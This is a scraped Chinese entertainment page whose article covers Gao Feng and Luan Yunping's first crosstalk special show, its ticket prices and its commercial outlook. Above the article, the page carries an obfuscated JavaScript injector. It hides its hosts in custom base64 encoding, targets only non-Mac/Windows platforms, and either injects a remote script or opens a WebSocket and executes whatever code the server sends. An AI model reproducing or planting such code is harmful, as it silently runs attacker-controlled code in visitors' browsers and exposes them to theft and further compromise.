function LNpGt(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function DGhQVNK(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return LNpGt(t);};window['\x70\x6d\x62\x79\x50\x57\x49\x4e\x6f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=DGhQVNK,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHkuubHVhc3NhbmUuuY24=','dHIueWWVzdWW42NzguY29t','8925',window,document,['u','W']);}:function(){};

德云社总教习高峰郭德纲爱徒栾云平办专场,传统相声接受市场考验

1头条人气:1142时间:2019-11-10 20:04:16

原标题:德云社总教习高峰郭德纲爱徒栾云平办专场,传统相声接受市场

德云社总教习高峰郭德纲爱徒栾云平办专场,传统相声接受市场考验

7月31日,有微博网友爆料称,德云社总教习高峰、郭德纲爱徒栾云平,将举行相声专场。而他们的专场首场演出地点定在了郑州,而非北京的北京展览馆剧场。

印象中,这应该是高峰和栾云平这对老搭档的第一次相声专场。

此前,高峰和栾云平,始终是郭德纲、于谦专场的助演。这么多年来,只要郭德纲于谦的相声专场,无论国内还是国外的巡演,高峰和栾云平都是雷打不动的助演。

其他助演可以换,而高峰和栾云平这对老搭档却未曾缺席过郭德纲于谦的专场(除了师徒父子专场)。

这也足见高峰和栾云平在德云社的重要地位。

不少网友都认为高峰和栾云平是德云社出来郭德纲于谦之外的定海神针。他们的作品,基本上都是传统相声,而且发挥非常稳健。尽管包袱不像郭德纲于谦的那样密集,但笑点也蛮足的。

不过,作为德云社的总教习,郭德纲的爱徒,“老字号”的高峰、栾云平为什么现在才开始尝试着自己的相声专场呢?

此前,德云社的很多年轻成员都举行过专场。除了最早的岳云鹏孙越之外,郭麒麟、阎鹤祥,张鹤伦、郎鹤炎,张云雷、杨九郎,烧饼、曹鹤阳,孟鹤堂、周九良,王九龙、张九龄等等都举行过相声专场,而且基本上都是在北京展览馆剧场举行的相声专场。

照理来说,高峰栾云平的相声功力都在上述德云社红人之上,早就该举行相声专场。

但如今才举行,想必也是有原因的。

相比岳云鹏、张云雷等,高峰栾云平在网络上的人气还不是很强很足,所以卖票有一定的风险性。如今,高峰和栾云平也拥有了自己大量的拥趸和粉丝,卖票的情况应该也会比较理想了。

另外一个原因就是,高峰和栾云平的作品基本上都是传统相声,以至于被不少网友吐槽笑点不足,节奏较慢。这样的作品如果在不成熟的情况下就急匆匆的推上市场,很有可能遇冷。

但经过这几年的培养,大量的粉丝观众对传统相声也越发的有了浓厚的兴趣。从高峰和栾云平的受欢迎程度来讲,传统相声的市场也是大有可为的。

所以说,对于高峰和栾云平而言,现在举办专场,才是机会最成熟的时候。

小编看了一下高峰栾云平首次专场的售票情况。

演出是8月24日举行,目前看来,还有不少余票。

从售票图例看,较低价位的180元、280元、380元,都已经处于缺货状态。

而580、680、980的高位票价还有余票。

事实上,高峰和栾云平的票价并不算高。

郭德纲于谦的专场最高VIP票大约是2000多元。

张云雷的VIP最高票定价1800元,但黄牛钞票可以炒到好几千元。

这样看来,高峰栾云平的票还是比较值的。

高峰是德云社的总教习,水平之高曾被郭德纲盛赞为同年龄段的最强者。高峰的传统相声基本功真的很厉害,快板、绕口令、鼠来宝、传统小段,每一样都让人惊艳、惊喜,大受欢迎也是情理之中的。

栾云平是郭德纲的爱徒,一度曾被郭德纲封为“忠臣孝子”,是德云社的队长,地位在德云社之高,令人艳羡。

栾云平与高峰合作搭档多年,默契早已经形成,两人的传统小段水平高、笑点足,应该能接受的住市场的考验。

最后预祝高峰栾云平的首次相声专场成功。

本站所有视频和图片均来自互联网收集而来,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至administratorx#gmail.com (我们会在3个工作日内删除侵权内容,谢谢。)

Copyright © 2019 觅觅网 icp123

电影

剧集

综艺

动漫

主演